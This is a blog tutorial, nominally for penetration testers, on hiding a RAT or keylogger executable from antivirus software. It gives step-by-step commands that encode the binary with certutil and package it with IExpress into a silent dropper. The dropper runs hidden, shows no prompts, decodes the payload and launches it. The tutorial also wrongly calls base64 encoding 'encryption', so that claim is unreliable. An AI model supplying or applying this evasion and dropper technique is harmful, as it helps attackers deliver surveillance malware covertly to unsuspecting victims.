Crypting EXE Tutorial : Hide RAT/Keylogger for Penetration Testing

Crypting EXE Tutorial : Hide RAT/Keylogger for Penetration Testing

It is possible to hide your RAT/keylogger stub without a crypter! As penetration testers we need sometimes to hide the PE payload from the Anti Virus (AV) Engines . For this we end up either using the paid Crypters that basically Encrypt the payloads or finding a technique that can make the malicious executable Fully Undetected .

This means evading the Anti Virus is either Time Consuming or we end up spending money. And the worst part is that this Fully Undetected EXE will only evade AV only for sometime as sooner or latter the engine will be updated .

The following technique will try and evade the AV engines to an extent . But there is no grantee for FUD until you are using your own server .

This is just to encrypt the EXE , so possibly the Scan Time FUD for a known binary . 

Crypting EXE Tutorial 


Step 1 : First, we need to fire up CMD (command Prompt) in your system.

To do that press WIN + R to start Run

Type CMD.

Hit Enter

Step 2 : Now use CD to go to the directory your stub (Binary/EXE) is placed. This is the file you want to encrypt .

Step 3 :  Now Type 

CERTUTIL -ENCODE name_of_stub.exe name.txt

Step 4 : In the same CMD type i express

This will open a GUI window dialog Box .

Step 5 : Follow the Steps in the Iexpress Dialog Box

Click on Next
--> Select "Extract and run an installation command"
 --> Type a package name
 --> Select "No prompt"
--> Select "no license"
--> Add the name.txt file and certutil.exe found in C:/windows/system32
--> In the "Installation command" type CERTUTIL - DECODE NAME.TXT STUB.EXE and in the "Post installation command" type start stub.exe
--> Select "Hidden"
 --> Select "No message"
 --> Type name of your dropper.

This is it . Now the EXE is encrypted by the Free windows utility . What exactly happened here is that the code of the EXE has been encrypted i.e made complex and therefore difficult for the AV engine to read .  The other use i can think for this tutorial is to make the code of your legit program scrambled so that it is difficult to be read or reverse engineered .


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s